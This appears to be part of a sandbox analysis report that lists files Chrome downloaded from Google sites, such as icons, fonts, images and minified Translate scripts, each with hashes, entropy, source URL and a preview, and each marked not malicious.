                                                                                                                                                                                                                                                            SHA-512:792FABC52F0D9DC8BDAC569C0AED7C6B61C29293B8EE43C62A50533F23EFE440C9EB4B34393D3BA82CBB32A99F43EA16ABBE2B187F9A88E013579194C43B4178
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/img/glue-help.svg
                                                                                                                                                                                                                                                            Preview:<svg id="help" width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 17h-2v-2h2v2zm2.07-7.75l-.9.92C13.45 12.9 13 13.5 13 15h-2v-.5c0-1.1.45-2.1 1.17-2.83l1.24-1.26c.37-.36.59-.86.59-1.41 0-1.1-.9-2-2-2s-2 .9-2 2H8c0-2.21 1.79-4 4-4s4 1.79 4 4c0 .88-.36 1.68-.93 2.25z"></path></svg>.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 31568, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):31568
                                                                                                                                                                                                                                                            Entropy (8bit):7.99179193151151
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:768:nV/PrFLvj4faRm0uZd9N56pGyOPRA3Y8NyjZ:pPrFbjU0m0Qd56pYA3YUa
                                                                                                                                                                                                                                                            MD5:EB11BFB369775FF0739DABB3A5F379CC
                                                                                                                                                                                                                                                            SHA1:2EEBAEA2F7080C0B256FBFC70AB91473243AF0F8
                                                                                                                                                                                                                                                            SHA-256:2E0BDC192134BB3950A1BA4C1148901E39EBD8D2D01F64EF23106E90A9F771B0
                                                                                                                                                                                                                                                            SHA-512:59E89752E932AADE54D5B2B940E09F3C8B12A836F1C5EB515E82036A97492F42E12A4FB3DC156CB8D969D6CB4E8FD8F18B358715F972E12D4596AD390430CB21
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/productsans/v9/pxiDypQkot1TnFhsFMOfGShVF9eO.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......{P......H...z...........................X..j.`....l..a.....P.._..8....h.6.$..l. ..8..{...[.3.@..o1.........(..vD.D^r.;..(..7%....?/i.a.t.kKa...fi(T.DE.....P.b..-n.i..=.q-1QR.$...1..3C.....A..v...y:.n....&M.}.p)...r...p.l...5t...I..N.....>G..Of.f...N.H"y.{9....d......u/..f.&=...:..@...A.e3.a2.e.R f.L..E..nN...mO...+.....f..`._..G....O...s].q..).m"k..a...U..........SDRR........^J..g.J......Mcic......u.f".|.:...J8./...zv.....?1.........<...[.-<.I........k<.M.kp]j.?...l.....d..Y ........k.(..M.S....E.(...~..#.........}..91 ...d...k...6....m.XA........p*.X.`.6...u.l...o..._....S._.G.....%SZ...K.~..1.Z.....vu..2...T.+E...Ob...\..D&...KdrR9..T"......Hr.T".. ..e........B0...._.O.\.33w.........-...2....u..K.+.J....R....G.TX....nI....@.."*l.%t..-$z<....1:.F.9.......5...f.4..%Y2.P.@.t.....S..e.1..z...o<....O.*ECp....z.....g. (...*....];...7...r..w....Z8W.$.z$.z.y{...6.........F.....'..y|...R.ss...[.UM.".}.d....d..f.%.l.A..N+\....H..Y..*t
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 914 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):145714
                                                                                                                                                                                                                                                            Entropy (8bit):7.981160606096131
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:Aw/3HjAFZfY8F6cd4mITyjwBzCN2Pg7inZIQZk/vLh/T:L3QlY6rf1wB2N2LnZIQZk/vLh7
                                                                                                                                                                                                                                                            MD5:CDB0226559B5391D0F732963964BD9B3
                                                                                                                                                                                                                                                            SHA1:B04BB4778185C92F4ADA0819DFB7FC66F4095521
                                                                                                                                                                                                                                                            SHA-256:F3E0EE4CD6E1E9A35C1B1E04D54F460F2C1CD0FAE443767A97953CA2E9D33DEE
                                                                                                                                                                                                                                                            SHA-512:8D916673C4CA819039F47268B2778A2D4706E7F5F4DB5B0CD4AEA3324D1DFE131BF1F1EC56C4F690EE09C1AB7D15101357B84A65E9E291BBC7B2A50278CA8FF8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2019/fall-equinox-2019-southern-hemisphere-5334567442448384-2x.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...............(Y....PLTE..............................................jhpUS\;5@DCMLKU_]fvt|<:H'&3$#1)*9.,7!!/. /..0-.>61:43B1/:''5)(4&%2#$3!"1"%5E:>VIF%&6,)4."2..0$#.*'2#"/&$0&$.(%/rbX/*22-6($.(%1-)1,&/.*3+(3,)3=39A22D435-2*&01+16,.:--0)0,'1*%..(0.&-=/00(.MA=>/,7-/2+0@0+J=G9.3=13<.,3)-5,/8+,^4'.? .>.z8!h7&J72G52L1*.D..K..M%N82q6#4+0R:3E0+.7.W*&.2.b+$U<3A1.J))T3)i,"o,!u- y-._4Aq8HC,7.H".;!O/;.=Nw@(D5LD4C.D(.J'N:4^@3X=3.3![?3aB3.?U.7!mNadC4jF4C5:.M'WF>`I?_NGT@9H97^D9gM@gRGgE4cUOm]RlXLnRBfH9sZJu_PyeVzj\lJ9qUEnN=}ob.N'lG4586.Z#.P!.]/..F.7.+.j,.E..D..B .=..D..H.7.> .v..-./.*.uG.(.Y+.e$.s&Q@UVFeK<b...G8V\Lq.[I.eN.[bUI..iaRDv.gIkN.N?m9@5YQ..yFlZ...O..C..O..H..Y..d..MlT.^X.y`.j^.lb..v.{s..z.vp.pl.kh.lj.sn...rml.nk.lj.kf.ic..yT~e.wt..V.[..T..N|.`g.LuG$ ..j..[..l.................Z...5.IDATx......... ..6.T1....................@..dm.0...._..i.W..V_.....s..SMD.*s..tw.0.."..D..q.D3...f:O.a...[..@4........]uY.B.7.I....c....H.....l...H.5-.}.xf'l...XW.....Ij...1.:..6.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (614)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):315205
                                                                                                                                                                                                                                                            Entropy (8bit):5.675575977669095
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:jUfAIV5rC60zO3Apg4y37vak3pp04h3NDQ+d4JDQRIFAjhg/9cODcxVyssUWZJS/:syBp9yrL304NNk+aJDQRIdLpUWbSgqlz
                                                                                                                                                                                                                                                            MD5:28F75E4C90C4A673D5766A221FF65EF8
                                                                                                                                                                                                                                                            SHA1:D92E0C76B4AE5CE6975584CF8BEA2A0611EE4AB1
                                                                                                                                                                                                                                                            SHA-256:E6214233AD5A0094FFD0F4846BB133599DAEBDC7407D365DC7CBDF4135B6CDC2
                                                                                                                                                                                                                                                            SHA-512:C8C287EB83DAE5BAC781A4579D5DB77267A195E40F1BC317246B47AB3F0C78513622131135CE7C21D39DB2FF8A772A87609CEA34FB373C424950EAC20A8CDC6F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/inputtools/js/ita/inputtools_3.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var aa="-t-k0-und",ba="Africa Latin",ca="CYRILLIC TYPEWRITTER",g="DIV",da="Deutsch",ea="Din\u00e9 bizaad - Modern",fa="Edge",ha="English",ia="Firefox",ka="Fran\u00e7ais",la="GOOGLE_INPUT_CHEXT_FLAG",ma="GOOGLE_INPUT_NON_CHEXT_FLAG",na="IFRAME",oa="INPUT",pa="IS_INPUT_ACTIVE",qa="Inscript",ra="Internet Explorer",sa="Invalid event type",ta="Italiano",ua="Move cursor to a text field before you click a candidate",va="Nederlands",wa="Opera",xa="PHONETIC",ya="Portugu\u00eas",za="Portugu\u00eas brasileiro",.Aa="Portugu\u00eas europeu",Ba="SCRIPT",n="SPAN",Ca="Symbol.iterator",Da="TEXTAREA",Ea="US International",Fa="about:invalid#zClosurez",Ga="absolute",Ia="act",Ja="action",Ka="activedescendant",La="af-t-i0-handwrit",Ma="am-t-i0-handwrit",Na="am-t-i0-und",Oa="ar-t-i0-handwrit",Pa="ar-t-i0-und",Qa="ar-t-k0-und",Ra="aria-label",Sa="as-t-i0-handwrit",Ta="assertive",Ua="autocapitalize",Va=
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2324)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):97027
                                                                                                                                                                                                                                                            Entropy (8bit):5.465699824958578
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:la3ky4g6ma6PRYy9VKDMus+FwIHzaZDbcyqmf2XSu1DpJdFhmT10KSBEkLH:t3z2ODPytZnhlAHDpJdXKS3
                                                                                                                                                                                                                                                            MD5:8DCED92EB242738DE245EBB35F6AC703
                                                                                                                                                                                                                                                            SHA1:6D8B49B161817917A1BEEE36904A2A3A1DEC2BC6
                                                                                                                                                                                                                                                            SHA-256:91428F2380D927550322021A99670A8B385D0A493B16A71BCE137CB420D6DAB9
                                                                                                                                                                                                                                                            SHA-512:93D4E8DBCC4C95D3B92E65F434DEEC712C7536644C697C450E3B7A044FB61236C9CE449F3898D8B7B49E11E741A2740CFAA37986CA78BD96B0D74F407F4F52BD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),r=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.r("Symbol",function(a){if(a)return a;var b=function(f,g){this.nc=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2309)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):13273
                                                                                                                                                                                                                                                            Entropy (8bit):5.428696796471868
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:7dK4wtLQwzbHNj5ifP2GSXZG9FqyZ+39yEPhQsZWJuSC:oi2bwP26wyEiJZC
                                                                                                                                                                                                                                                            MD5:F72FD49D1109A69AC41CFF1F3BC4D27C
                                                                                                                                                                                                                                                            SHA1:E7378D846F19BA029A76D84B5DF9C7108D36A8D9
                                                                                                                                                                                                                                                            SHA-256:D4EC1FE552471EE32579F8470536AF9CAD3E9E8A5D5EFC6444F66B733E92822B
                                                                                                                                                                                                                                                            SHA-512:AFD3B87018A4C87BF7CCC8CA80CCAFF0BE895B10F85FE63A787D62C442105006445665C19D9D19D0E9480E98F891C70A9AFE407F278CB3575259360BA7E4A5FF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverWebsiteTranslationUi.en.o0mxDulwOdA.es5.O/ck=boq-translate.TranslateWebserverWebsiteTranslationUi.2YpHW3SIPH4.L.B1.O/am=8CwACA/d=1/exm=A7fCU,BBI74,BVgquf,COQbmf,CXsKQe,DFTXbf,EEDORb,EFQ78c,GkRiKb,HwavCb,IZT63,J1hrIc,JH2zc,JNoxi,JWUKXe,JzDP5e,KG2eXe,KUM7Z,L1AAkb,L2d1X,LEikZe,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P5Thrf,PHUIyb,PrPYRd,PxcVCe,QIhFr,QM0Gm,RAnnUd,RMhBfe,SdcwHb,SpsfSb,U0aPgd,UUJqVe,Uas9Hd,Ulmmrd,V3dDOb,VNcg1e,VwDzFe,W225x,XVMNvd,Z5uLle,ZfAoz,ZwDk9d,_b,_r,_tp,aW3pY,aurFic,bTi8wc,byfTOb,cSdwA,e5qFLc,fKUV3e,gychg,hc6Ubd,i5H9N,i5dxUd,kWgXee,lsjVmc,lwddkf,m9oV,n73qwf,ovKuLd,pKzUve,pjICDe,pw70Gc,qNG0Fc,qRXAtf,rFVO7,s39S4,sJhETb,soHxf,t1sulf,tQKCld,thZ3rf,tsNC9c,uu7UOe,w9hDv,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yRXbo,ywOR5c,zbML3c,zr1jrb/excm=_b,_r,_tp,iframenavigationview/ed=1/wt=2/rs=ANkVxDmi4UYesv_--ainEA18nAlROTRZyg/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;zxnPse:GkRiKb;EVNhjf:pw70Gc;JsbNhc:Xd8iUd;oGtAuc:sOXFj;eBAeSb:zbML3c;NSEoX:lazG7b;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;pXdRYb:MdUzUe;nAFL3:s39S4;iFQyKf:QIhFr;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=RqjULd"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverWebsiteTranslationUi=this.default_TranslateWebserverWebsiteTranslationUi||{};(function(_){var window=this;.try{._.w("RqjULd");.var waa=function(a){if(_.t&&_.t.performance&&_.t.performance.memory){var b=_.t.performance.memory;if(b){var c=new EO;isNaN(b.jsHeapSizeLimit)||_.A(c,1,Math.round(b.jsHeapSizeLimit).toString());isNaN(b.totalJSHeapSize)||_.A(c,2,Math.round(b.totalJSHeapSize).toString());isNaN(b.usedJSHeapSize)||_.A(c,3,Math.round(b.usedJSHeapSize).toString());_.Wk(a,EO,1,c)}}},xaa=function(a){if(FO()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new GO;if(b=b[0]){switch(b.type){case "navigate":c.Ff(1);.break;case "reload":c.Ff(2);break;case "back_forward":c.Ff(3);break;case "prerender":c.Ff(4);break;default:c.Ff(0)}var d=_.A(c,2,Math.round(b.startTime));d=_.A(d,3,Math.round(b.fetchStart));d=_.A(d,4,Math.round(b.domainLookupStart));d=_.A(d,5,Math.round(b.domainLookupEnd));d=_.A(d,6,Math.round(b.connectStart));d=
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):458
                                                                                                                                                                                                                                                            Entropy (8bit):5.2421705708861035
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:k6El6qF5j6stx50IYRHhimIy87pkbRNkN0:k6Pq7j6stxJYvSy8+rkK
                                                                                                                                                                                                                                                            MD5:532A08E566635DCD6B0CC7FB4F7C89DE
                                                                                                                                                                                                                                                            SHA1:7184174CC9D47BDC7F6E028E58512583D2B59231
                                                                                                                                                                                                                                                            SHA-256:809E25708F3E7B336D99E3B9007908DD6D41DB6F47FE17679F45317B1060FA64
                                                                                                                                                                                                                                                            SHA-512:E401661678C57F3DF4BC9C0217A2E2E8215E5ABE73DC190BD55C28D25C2AA124228717182F828E69E485699F7B1D049ECE87BDEDB8C954577053390AFF771E07
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HgVFRb,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=T8kZcd"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("T8kZcd");.var mX=function(a){_.jw.call(this,a.va)};_.C(mX,_.jw);mX.qa=_.jw.qa;mX.prototype.Hc=function(){return"T8kZcd"};mX.prototype.Gd=function(){return!0};mX.prototype.Ic=function(){return _.qS};_.iw(_.Xra,mX);_.Dv.T8kZcd=_.pz;._.p();.}catch(e){_._DumpException(e)}.}).call(this,this.default_TranslateWebserverUi);.// Google Inc..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 660 x 333, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):163289
                                                                                                                                                                                                                                                            Entropy (8bit):7.989125491068949
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:WiUIaXAhs2y/pRbSHcdujFc9mXLD4gra7Qpw4eAaH/XvoIkDh/yNLBACewu:WjXcavrKq6vy7swltXqDh/Ui3T
                                                                                                                                                                                                                                                            MD5:087DE35333C38A74D70911B06B8A4925
                                                                                                                                                                                                                                                            SHA1:A4971DEB635A5718013DF52B161FBE61F236592F
                                                                                                                                                                                                                                                            SHA-256:5CF833E87BBF262985CA366DEC0ABE4A0FA850F702E79BDCB1028307532F2601
                                                                                                                                                                                                                                                            SHA-512:13CAD730106C3BB0185BE13AF310E77E3163387A137D81F850E4B666382F6ECEC9662BD3FE19FD39192B11FA3980D214394ECE5DC2061BAF6E7E2D4B191A9076
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/2qXSisrJyDKIya5ouYiCtVAEdZdM2HfTjduDaAVsk-v_SeZtoIZnu79Ol1xz14NfzU2xqV0PIX13I_sx5GQ4gdGyIsKhsgMazdk-2tQ=s660
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......M.....1th.....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx...w.e.]......7...s...<( .c.. ........,...........`.........0&........49O.t......|O.{...................N...|..Af..,.^?.z.eY.eY_...eY..:c..,.^glx[.eY...o.,.z...mY.eY.36.-.,.u..eY.e....,...K..]..6.-.nfx..3........eY..k0...M....6._7lx[.e..........]\. ..#6.-.nB<..6...3On.._y.~..h \........q..,...Q....f...'........_c...........q..,....Q..z]y...WKO..x..3.~.........76..eY7...4......O.,.g..}._...C....z.....,.. ..0j4....#......;:..........z.....o....a3...W...1D....J...3...../..?i.>.:..m+....eY..%.....m..4#(.2%.Ev..0.`........g....l...plx[.e.\.a0.t.g.6.f.k......(.n...?R..O?P...h..mA....,..0.h8.......O..6d./.6.....Y;..L........{..O.....eY.M$..N..\=^8......."..ja..#.Gp..?.:$%..~..k.dp.$..t...?..eY7.K......%<.i7.)...C.\4-w...D...d..I..f&C...o...8:.<.....}...mY.uS`.`.t{.r....#..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 14240, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14240
                                                                                                                                                                                                                                                            Entropy (8bit):7.983805755246
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:8BimDnV/gBgI61OdM2hk2gGQanVwoJ6wjBbcoCnQouGNiJo:QVV/gN1dMukJkVwo0sdtCnQ7Gf
                                                                                                                                                                                                                                                            MD5:8CC018AD83EAB0061C6E169C61A85848
                                                                                                                                                                                                                                                            SHA1:1664D06A013625EBB1F825ED10328F66F3202412
                                                                                                                                                                                                                                                            SHA-256:7027D4F4817E4725BC3AAA07B3CE4B9275CC51E51303570FE5DF3818116C0ACB
                                                                                                                                                                                                                                                            SHA-512:D8AAEBE9F8435B118F224178B4B44FB3BC5898B676D923C40721AD8B02DB1842A41B16D647EDB7676CB80C60BBCC2576F33672AE56D28B2031ABD260AC594653
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......7........(..71..........................%..F...?HVAR.s.`?STAT..'...&/<....|.y....0.x.6.$.... ..>. .....5l.F.;.....{4".......H..q..Xg...99.C.....+.....i.%t.S]*J,o..f.I.h.|c.*..@E.....'.0+~..7.H../...Co.[.Y...2~mn8..L.')%E..q.g".{cbQ..-_...V..S.I4Q.\%Z..xGJ..q.&..i...M.....`.Ve....R.....}&..._?]o.....1(.H..^....A........9w.#.....4.M$kd".PH......!...n^fR...$.D.&N.@!..Z.+.i;.W.^L...~..{.sr.......k}@......vJ..<.5=?=.@......^RH.se.....?...-u$@HH....?QYo.n+.'_.?-.]N.7mU.dj7...0.F#.~}.......v...v....qy.rRx..4.\>.....TV....O"_*...p..h...`iq.o.....?..`.W..B...up.........v.......`....v....A.....k.2E.*)*yv..v.c^k.2...Y...............%.C....b..a..OY......_-..3R.;.L`H......'m..)#........9....g...>.~.....s6.o.Klh.i}..6{..;...T..J."..R$."..J..U..j..G...A4..../s...k.....SKc.."`D......c...........`.\..A..A...... ....#..>...d.BALL.JCll..... ^^..d.D.. ...5H..$ ..6..k....d.:.z......Sj4..d.........D....T.U.D......YG.qA...F.j?....dV..z...YpQ.K..;.C`....`.=....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 20784, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):20784
                                                                                                                                                                                                                                                            Entropy (8bit):7.989041194123322
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:ldrXYIW4bkISLBTb0r2/y5Eod0/ihRUCuZwCGQf1Hvw/WCZmMyz6:l9YIWzIAfe6yTd0/k0ZZGQ1Y+c9yO
                                                                                                                                                                                                                                                            MD5:E11C810C086DF83C0876DD59ED32EBCB
                                                                                                                                                                                                                                                            SHA1:B89FE2ED6D016F81AF13B35797AD2B0E2E5C6822
                                                                                                                                                                                                                                                            SHA-256:ACC5497E76F832D950D14FCFA047DC3C864F7A0AAE4C7A20521C0C655A53033B
                                                                                                                                                                                                                                                            SHA-512:DB93E7E4818B40C7B16C241441A5BBFCD335121A89A737611ACA4E5BD1F22A7D8FD9A1E79E0D0A7701A497CF6BBC238A7417D5DAC3480D20D4742B9B9717A15C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8FacM9Wef3EJPWRrHjgE4B6CnlZxHVDv79oQ.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......Q0.......l..P..............................b..@.`..~..L..u.....D..'.....6.$.... .....X..#.....6..w;.v....n....yeUtv0v;.+...e..g$'24P.i.6n.!f;C.s&q...S...d..".............T;:....$...9I.....F.....?...px...q.:..qN.+G.X.i.....7N... p.cN...t...wb..."...E>....'Q..._=g... ..1......;..A........i.Z*...X.".....1T'..1.N.....s...-[.-.c.c;.I..@w.>...==...L...C.8.....m..)n,.........8....%.Z..~.W..o....^.*_-_.D...{.~.i.......U.J."..P..%E.nB=.f...5...J...:.$dQ.T).l_..t1...1.o.aI....C.........a[...d......a.:w...-x.;.2.. ...CjA..u...&iS..[.%.G...../n...#.....:../.+.1..........O../.....9g..Cf.J.....&....pS.h.......M%.......=.>&.E..Rj+..#.e]....G.*.bE,...`.........s.V.].\9.....S....e$.....).".PU.......\..n.Kl[u..+..U.....M&...,......R.U.....;ck......Y..j.....i5.*f#.x............t..[ ..Q.0A.W.......xV....:M.\..r#M`2.R.l..p..p......O...P...k6...F4O..%...x...5}g...OY?.8.0..f..+....`Tb3S@a..Q.A...%. ......(..;..P;.Q...k.AJH.s...l.^...^.!.......cc,=.......o
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
